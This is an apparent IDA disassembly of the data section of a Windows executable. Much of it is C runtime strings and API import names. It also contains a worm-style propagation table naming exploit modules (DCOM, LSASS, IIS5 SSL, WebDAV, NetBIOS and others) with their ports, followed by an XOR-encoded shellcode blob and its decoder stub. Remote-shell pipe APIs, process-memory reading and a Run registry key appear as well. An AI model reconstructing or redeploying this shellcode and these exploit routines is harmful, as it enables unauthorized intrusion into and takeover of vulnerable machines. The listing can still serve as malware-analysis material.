dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
stru_42C0A8 _msEH <0FFFFFFFFh, 0, offset sub_419FC0> ; DATA XREF: sub_419F8E+2�o
align 8
stru_42C0B8 _msEH <0FFFFFFFFh, 0, offset sub_41AE1A> ; DATA XREF: sub_41ADA6+2�o
align 8
stru_42C0C8 _msEH <0FFFFFFFFh, 0, offset sub_41AFC3> ; DATA XREF: sub_41AEF7+2�o
dd 2 dup(0)
dd offset sub_41AF92
stru_42C0E0 _msEH <0FFFFFFFFh, 0, offset sub_41B468> ; DATA XREF: sub_41B3E4+2�o
align 10h
stru_42C0F0 _msEH <0FFFFFFFFh, 0, offset sub_41BAD0> ; DATA XREF: sub_41B9BA+2�o
align 10h
dbl_42C100 dq 0.0 ; DATA XREF: sub_41BB63+6�r
dword_42C108 dd 30302B65h, 30hdbl_42C110 dq 1.0 ; DATA XREF: sub_41BF01+2A�r
dbl_42C118 dq 4.195835e6 ; DATA XREF: sub_41BF01+F�r
dbl_42C120 dq 3.145727e6 ; DATA XREF: sub_41BF01+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_41BF41+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_41BF41�o
align 10h
dword_42C150 dd 2 dup(0) ; sub_41E8E0+1E�o ...
stru_42C158 _msEH <0FFFFFFFFh, offset loc_41C432, offset loc_41C436>
; DATA XREF: sub_41C139+2�o
dd 0FFFFFFFFh, 41C22Fh, 41C233h, 0FFFFFFFFh, 41C2FDh, 41C301h
dd 0
db 2 dup(0)
word_42C182 dw 20h ; DATA XREF: sub_420874+18�r
; .text:004323D0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 41h dup(0)
db 2 dup(0)
word_42C38A dw 20h ; DATA XREF: .text:off_432A44�o
aHH_0:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
stru_42C590 _msEH <0FFFFFFFFh, offset sub_41C512, offset loc_41C516>
; DATA XREF: sub_41C526-2F�o
align 10h
stru_42C5A0 _msEH <0FFFFFFFFh, 0, offset sub_41C700> ; DATA XREF: sub_41C653+2�o
align 10h
dd offset loc_41C6C6
dd offset loc_41C6CF
stru_42C5B8 _msEH <0FFFFFFFFh, offset sub_41C755, offset loc_41C75E>
; DATA XREF: sub_41C721+2�o
align 8
stru_42C5C8 _msEH <0FFFFFFFFh, 0, offset sub_41C8C0> ; DATA XREF: sub_41C783+2�o
align 8
dd offset loc_41C808
dd offset loc_41C84B
stru_42C5E0 _msEH <0FFFFFFFFh, offset sub_41CA9A, offset loc_41CA9E>
; DATA XREF: sub_41C92A+2�o
align 10h
stru_42C5F0 _msEH <0FFFFFFFFh, offset loc_41CE76, offset loc_41CE7A>
; DATA XREF: sub_41CE51+2�o
align 10h
stru_42C600 _msEH <0FFFFFFFFh, offset loc_41CEA3, offset loc_41CEA7>
; DATA XREF: sub_41CE86+2�o
align 10h
stru_42C610 _msEH <0FFFFFFFFh, 0, offset sub_41D159> ; DATA XREF: sub_41D0F6+2�o
align 10h
stru_42C620 _msEH <0FFFFFFFFh, 0, offset sub_41D442> ; DATA XREF: sub_41D2FB+2�o
align 10h
stru_42C630 _msEH <0FFFFFFFFh, 0, offset sub_41D5D6> ; DATA XREF: sub_41D5A4+2�o
align 10h
stru_42C640 _msEH <0FFFFFFFFh, offset loc_41D61B, offset loc_41D61F>
; DATA XREF: sub_41D5EE+2�o
align 10h
stru_42C650 _msEH <0FFFFFFFFh, offset loc_41D65F, offset loc_41D663>
; DATA XREF: sub_41D632+2�o
align 10h
stru_42C660 _msEH <0FFFFFFFFh, 0, offset sub_41D76E> ; DATA XREF: sub_41D6EA+2�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_432B5C�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41D8F7+12C�o
; sub_4204ED+134�o
align 10h
asc_42C990 db 0Ah ; DATA XREF: sub_41D8F7+110�o
; sub_4204ED+101�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41D8F7+FE�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_41D8F7+CA�o
; sub_4204ED+D1�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41D8F7+89�o
; sub_4204ED+88�o
align 10h
stru_42C9D0 _msEH <0FFFFFFFFh, 0, offset sub_41E492> ; DATA XREF: sub_41E40E+2�o
align 10h
stru_42C9E0 _msEH <0FFFFFFFFh, 0, offset sub_41E655> ; DATA XREF: sub_41E5AE+2�o
align 10h
stru_42C9F0 _msEH <0FFFFFFFFh, offset loc_41E9B9, offset loc_41E9BD>
; DATA XREF: sub_41E8E0+2�o
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .text:00432D4C�o
aMmDdYy db 'MM/dd/yy',0
align 4
aDecember db 'December',0
align 4
aNovember db 'November',0
align 4
aOctober db 'October',0
aSeptember db 'September',0
align 4
aAugust db 'August',0
align 10h
aJuly db 'July',0
align 4
aJune db 'June',0
align 10h
aApril db 'April',0
align 4
aMarch db 'March',0
align 10h
aFebruary db 'February',0
align 4
aJanuary db 'January',0
aDec db 'Dec',0
aNov db 'Nov',0
aOct db 'Oct',0
aSep db 'Sep',0
aAug db 'Aug',0
aJul db 'Jul',0
aJun db 'Jun',0
aMay db 'May',0
aApr db 'Apr',0
aMar db 'Mar',0
aFeb db 'Feb',0
aJan db 'Jan',0
aSaturday db 'Saturday',0
align 10h
aFriday db 'Friday',0
align 4
aThursday db 'Thursday',0
align 4
aWednesday db 'Wednesday',0
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: .text:00432CCC�o
aMonday db 'Monday',0 ; DATA XREF: .text:00432CC8�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: .text:00432CC4�o
align 4
aSat db 'Sat',0
aFri db 'Fri',0
aThu db 'Thu',0 ; DATA XREF: .text:00432CB8�o
aWed db 'Wed',0 ; DATA XREF: .text:00432CB4�o
aTue db 'Tue',0
aMon db 'Mon',0
aSun db 'Sun',0 ; DATA XREF: .text:off_432CA8�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_41EF60+2D�o
align 10h
stru_42CB40 _msEH <0FFFFFFFFh, offset loc_41EFBD, offset loc_41EFCB>
; DATA XREF: sub_41EF60+2�o
align 10h
stru_42CB50 _msEH <0FFFFFFFFh, 0, offset sub_41F7CB> ; DATA XREF: sub_41F72E+2�o
align 10h
stru_42CB60 _msEH <0FFFFFFFFh, 0, offset sub_41F87C> ; DATA XREF: sub_41B07E+476E�o
align 10h
stru_42CB70 _msEH <0FFFFFFFFh, 0, offset sub_41FBB1> ; DATA XREF: sub_41FB6C+2�o
align 10h
stru_42CB80 _msEH <0FFFFFFFFh, offset loc_42039D, offset loc_4203A1>
; DATA XREF: sub_4202C8+2�o
dword_42CB8C dd 676F7250h, 3A6D6172h, 20haABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: sub_4204ED+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: sub_4204ED:loc_42054A�o
align 8
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: sub_4204ED+4F�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: sub_4204ED+4A�o
align 10h
stru_42CD30 _msEH <0FFFFFFFFh, offset loc_420528, offset loc_42052C>
; DATA XREF: sub_4204ED+5�o
align 10h
stru_42CD40 _msEH <0FFFFFFFFh, 0, offset sub_42076F> ; DATA XREF: sub_420705+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_42077B+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_42077B+62�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_42077B+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_42077B+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_42077B+2E�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_4210C1:loc_4211B0�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_4210C1+D2�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_4210C1+C1�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_4210C1+A7�o
align 10h
stru_42CE10 _msEH <0FFFFFFFFh, 0, offset sub_4214B6> ; DATA XREF: sub_421383+2�o
align 10h
stru_42CE20 _msEH <0FFFFFFFFh, offset loc_421AF0, offset loc_421AF4>
; DATA XREF: sub_4219DA+2�o
dd 0FFFFFFFFh, 421B7Dh, 421B81h
stru_42CE38 _msEH <0FFFFFFFFh, offset loc_421D81, offset loc_421D85>
; DATA XREF: sub_421C8A+2�o
dd 0FFFFFFFFh, 421DF3h, 421DF7h, 0
dword_42CE54 dd 2 dup(0) ; sub_41D5EE:loc_41D601�o
dword_42CE5C dd 0 ; sub_41D632:loc_41D645�o
dd 0FFFFFFFFh, 421EAFh
dword_42CE68 dd 19930520h, 1, 42CE60h, 4 dup(0) dd 2CEC0h, 2 dup(0)
dd 2D688h, 22000h, 2D0A0h, 2 dup(0)
dd 2D696h, 221E0h, 5 dup(0)
dd 7C802442h, 7C910331h, 7C810637h, 7C80B4CFh, 7C80C058h
dd 7C9010EDh, 7C901005h, 7C80929Ch, 7C80B829h, 7C91188Ah
dd 7C80A7D4h, 7C809B47h, 7C810D87h, 7C801A24h, 7C80A427h
dd 7C82FA46h, 7C81CDDAh, 7C802367h, 7C814EEAh, 7C80EDD7h
dd 7C834EB1h, 7C8137D9h, 7C91043Dh, 7C9105D4h, 7C80ABC1h
dd 7C80E7ECh, 7C80E866h, 7C80B9A0h, 7C8021CCh, 7C812D56h
dd 7C8309E1h, 7C80ABDEh, 7C80F0F4h, 7C80ADA0h, 7C801D77h
dd 7C80180Eh, 7C810B8Eh, 7C810A77h, 7C83632Dh, 7C8361EEh
dd 7C81153Ch, 7C80B6A1h, 7C82F7A0h, 7C80FE82h, 7C80FF19h
dd 7C80B974h, 7C80B905h, 7C80945Ch, 7C831CB8h, 7C831C45h
dd 7C8329D9h, 7C812782h, 7C835DCAh, 7C809BF8h, 7C80A0D4h
dd 7C8216A4h, 7C80DDF5h, 7C831EABh, 7C801E16h, 7C80BAA1h
dd 7C81CE03h, 7C835E8Fh, 7C809920h, 7C8286EEh, 7C802520h
dd 7C80E93Fh, 7C81AE17h, 7C85F90Fh, 7C80DDFEh, 7C81E0C7h
dd 7C81B58Bh, 7C80D262h, 7C812ADEh, 7C830B14h, 7C873A31h
dd 7C80A05Dh, 7C8310F2h, 7C8312E5h, 7C832044h, 7C9109EDh
dd 7C80BCCFh, 7C809E01h, 7C84467Dh, 7C812641h, 7C81DC03h
dd 7C809EF1h, 7C80A490h, 7C9179FDh, 7C8017E5h, 7C937A40h
dd 7C801EEEh, 7C812F1Dh, 7C8136D7h, 7C910340h, 7C809728h
dd 7C809BC5h, 7C809740h, 7C812D9Fh, 7C810EF8h, 7C812BB6h
dd 7C809AE4h, 7C809A51h, 7C809E79h, 7C801AD0h, 7C80B9D1h
dd 7C838DE8h, 7C80CCA8h, 7C809915h, 7C8127A7h, 7C812E76h
dd 7C812F39h, 7C862E2Ah, 7C81DF77h, 7C81CF5Bh, 7C814AE7h
dd 7C812F08h, 7C80CC97h, 7C810E51h, 7C838A0Ch, 0
dd 80000015h, 8000000Ah, 80000002h, 8000000Dh, 80000012h
dd 80000097h, 80000001h, 80000010h, 80000013h, 80000073h
dd 80000017h, 8000000Bh, 80000009h, 80000004h, 80000003h
dd 80000074h, 0
db 29h ; )
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 5Ah ; Z
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aE_0 db 'e',0
aCreatethread db 'CreateThread',0
align 4
db 65h ; e
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
aM_1 db '',0
aExitthread db 'ExitThread',0
align 10h
db 2Dh ; -
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
db '',0
aEntercriticals db 'EnterCriticalSection',0
align 10h
db 0BEh ;
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 10h
db 3
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aV_0 db 'v',0
aDeletecritical db 'DeleteCriticalSection',0
db 5Ch ; \
db 1, 47h, 65h
aTlocaltime db 'tLocalTime',0
align 10h
db ',',0
aClosehandle db 'CloseHandle',0
dw 376h
aWritefile db 'WriteFile',0
aJ_0 db 'J',0
aCreatefilea db 'CreateFileA',0
db 7Eh ; ~
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 27Fh
aQueryperform_1 db 'QueryPerformanceFrequency',0
db '',0
aExitprocess db 'ExitProcess',0
db '\',0
aCreateprocessa db 'CreateProcessA',0
align 2
dw 1A6h
aGetsystemdirec db 'GetSystemDirectoryA',0
db '',0
aFindclose db 'FindClose',0
db '',0
aFindnextfilea db 'FindNextFileA',0
db '',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 1F5h
aHeapfree db 'HeapFree',0
align 2
dw 1EFh
aHeapalloc db 'HeapAlloc',0
dw 18Bh
aGetprocessheap db 'GetProcessHeap',0
align 4
db '',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 4
db '',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
dw 35Eh
aVirtualqueryex db 'VirtualQueryEx',0
align 10h
db 93h ;
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
db 0A8h ;
db 1, 47h, 65h
aTsysteminfo db 'tSystemInfo',0
db 61h ; a
db 2, 4Fh, 70h
aEnprocess db 'enProcess',0
db '',0
aFreelibrary db 'FreeLibrary',0
db 43h ; C
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableW',0
dw 189h
aGetprocaddress db 'GetProcAddress',0
align 4
db 2Eh ; .
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 90h
db 2, 52h, 65h
aAdfile db 'adFile',0
align 4
db 0F1h ;
db 2, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 14Dh
aGetfilesize db 'GetFileSize',0
db 0BFh ;
db 1, 47h, 65h
aTtimeformata db 'tTimeFormatA',0
align 2
dw 133h
aGetdateformata db 'GetDateFormatA',0
align 4
db 48h ; H
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 167h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aR_0 db '',0
aFormatmessagea db 'FormatMessageA',0
align 4
db 0E9h ;
db 1, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 4
db 0E2h ;
db 1, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 345h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 44h ; D
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aK_0 db 'K',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 2F5h
aSetfiletime db 'SetFileTime',0
dd 6547014Fh, 6C694674h, 6D695465h, 0AE0065h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 2EFh
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 0B6h ;
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 51h ; Q
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 369h
aWidechartomult db 'WideCharToMultiByte',0
db 1
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 4
db 2Fh ; /
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 'x',0
aDeletefilea db 'DeleteFileA',0
dw 331h
aTerminateproce db 'TerminateProcess',0
align 2
dw 395h
aLstrcmpia db 'lstrcmpiA',0
dw 332h
aTerminatethrea db 'TerminateThread',0
db 4Ah ; J
db 2, 4Dh, 6Fh
aVefilea db 'veFileA',0
db 30h ; 0
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcessId',0
db ':',0
aCopyfilea db 'CopyFileA',0
dw 365h
aWaitforsingleo db 'WaitForSingleObject',0
aW db 'W',0
aCreatemutexa db 'CreateMutexA',0
align 4
db 44h ; D
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 26Ch
aPeeknamedpipe db 'PeekNamedPipe',0
aI_1 db '',0
aDuplicatehandl db 'DuplicateHandle',0
db '[',0
aCreatepipe db 'CreatePipe',0
align 2
dw 2C8h
aSetconsolectrl db 'SetConsoleCtrlHandler',0
dw 15Dh
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
db 0C8h ;
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 61h ; a
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 4
db '',0
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 4
db 63h ; c
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 1E3h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 4
db 3Bh ; ;
db 3, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
dw 1F9h
aHeaprealloc db 'HeapReAlloc',0
db 0ACh ;
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 2B1h
aRtlunwind db 'RtlUnwind',0
dw 19Ch
aGetstartupinfo db 'GetStartupInfoA',0
db 0FDh ;
align 2
aGetcommandline db 'GetCommandLineA',0
dw 337h
aTlsfree db 'TlsFree',0
db 0FEh ;
db 2, 53h, 65h
aTlasterror_0 db 'tLastError',0
align 4
db 32h ; 2
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 339h
aTlssetvalue db 'TlsSetValue',0
db 38h ; 8
db 3, 54h, 6Ch
aSgetvalue db 'sGetValue',0
dw 336h
aTlsalloc db 'TlsAlloc',0
align 2
dw 1F3h
aHeapdestroy db 'HeapDestroy',0
db 0F1h ;
db 1, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 358h
aVirtualfree db 'VirtualFree',0
db 55h ; U
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 14h
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 5Bh ; [
db 3, 56h, 69h
aRtualprotect db 'rtualProtect',0
align 2
dw 35Dh
aVirtualquery db 'VirtualQuery',0
align 2
dw 220h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 221h
aLcmapstringw db 'LCMapStringW',0
align 2
aI_2 db '',0
aGetacp db 'GetACP',0
align 4
db 7Ch ; |
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 0F1h ;
align 2
aGetcpinfo db 'GetCPInfo',0
db 9Eh ;
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 10h
db 42h ; B
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aU_0 db '',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 13Fh
aGetenvironment db 'GetEnvironmentStrings',0
aF db '',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 41h ; A
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStringsW',0
align 2
dw 2FAh
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470150h, 6C694674h, 70795465h, 19F0065h, 53746547h
dd 6E697274h, 70795467h, 4165h, 654701A2h, 72745374h, 54676E69h
dd 57657079h, 2020000h
aInitializecr_0 db 'InitializeCriticalSection',0
dw 30Ch
aSetstdhandle db 'SetStdHandle',0
align 2
db '',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 2
dw 31Dh
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 73490211h, 52646142h, 50646165h, 7274h, 7349020Eh, 43646142h
dd 5065646Fh, 7274h, 654801FBh, 69537061h, 657Ah, 655302E8h
dd 646E4574h, 6946664Fh, 656Ch, 1A4h dup(0)
dword_42E000 dd 0 dd offset sub_420497
dword_42E008 dd 0 dword_42E00C dd 0 dd offset sub_41AFD5
dd offset sub_41D44B
dd offset sub_41D57C
dd offset sub_42067D
dword_42E020 dd 0 dword_42E024 dd 0 dd offset sub_41B07E
dword_42E02C dd 0 dword_42E030 dd 0 ; DATA XREF: sub_4182E0:loc_41836E�o
dd offset sub_420690
dword_42E038 dd 2 dup(0) aWebdav db 'webdav',0 ; DATA XREF: sub_401950+155�o
align 4
db 2 dup(0)
aWebdav_0 db 'WebDav',0 ; DATA XREF: sub_413C0C+2B2�o
; .text:004147F7�o ...
align 4
dd 5 dup(0)
dword_42E068 dd 50h ; sub_409806+4425�r ...
off_42E06C dd offset sub_413C0C ; DATA XREF: sub_401950+1D7�r
dword_42E070 dd 0 dword_42E074 dd 1 dword_42E078 dd 0 aNetbios db 'netbios',0
dd 654E0000h, 6F694274h, 73h, 5 dup(0)
dd 8Bh, 416176h, 3 dup(0)
aNtpass db 'ntpass',0
align 10h
dd 544E0000h, 73736150h, 6 dup(0)
dd 1BDh, 416176h, 3 dup(0)
aDcom135 db 'dcom135',0
dd 63440000h, 33316D6Fh, 35h, 5 dup(0)
dd 87h, 414520h, 0
dd 1, 0
aDcom445 db 'dcom445',0
dd 63440000h, 34346D6Fh, 35h, 5 dup(0)
dd 1BDh, 414520h, 0
dd 1, 0
aDcom1025 db 'dcom1025',0
align 2
aDcom1025_0 db 'Dcom1025',0
align 10h
dd 5 dup(0)
dd 401h, 414520h, 0
dd 1, 0
aDcom2 db 'dcom2',0
align 10h
dd 63440000h, 326D6Fh, 6 dup(0)
dd 87h, 41485Ch, 0
dd 1, 0
aIis5ssl db 'iis5ssl',0
dd 49490000h, 53533553h, 4Ch, 5 dup(0)
dd 1BBh, 414A8Fh, 0
dd 1, 0
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 41564Fh, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 8Bh, 41581Ah, 0
dd 2 dup(1), 6974706Fh, 78h, 704F0000h, 786974h, 6 dup(0)
dd 0C44h, 416343h, 3 dup(0)
aKuang2 db 'kuang2',0
align 4
dd 754B0000h, 32676E61h, 6 dup(0)
dd 4394h, 414DFAh, 12h dup(0)
aLsass_445_1 db 'lsass_445',0
byte_42E356 db 1 ; DATA XREF: sub_409806:loc_40DBA3�r
; sub_409806+43A9�o
aLsass_139 db 'lsass_139',0
db 1, 2 dup(0)
align 10h
loc_42E370: ; DATA XREF: .text:00414BA3�o
jmp short loc_42E382
; =============== S U B R O U T I N E =======================================
sub_42E372 proc near ; CODE XREF: sub_42E372:loc_42E382�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_42E37A: ; CODE XREF: sub_42E372+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42E37A
jmp short loc_42E387
; ---------------------------------------------------------------------------
loc_42E382: ; CODE XREF: .text:loc_42E370�j
call sub_42E372
loc_42E387: ; CODE XREF: sub_42E372+E�j
jo short near ptr dword_42E2FC+26h
cwde
cdq
cdq
retn
sub_42E372 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
dword_42E4F0 dd 80000002h off_42E4F4 dd offset aSoftwareMicr_0 ; DATA XREF: sub_40210D+1E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 42FEA8h, 80000001h, 42FEE0h
dword_42E508 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42E554 dd 3000005h, 10h, 18h, 1, 3 dup(0); ---------------------------------------------------------------------------
loc_42E570: ; DATA XREF: sub_403FEB+10F�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_42E584 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_403FEB+138�o
dd 8
dword_42E59C dd 62h, 62000000h, 2 dup(0) dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
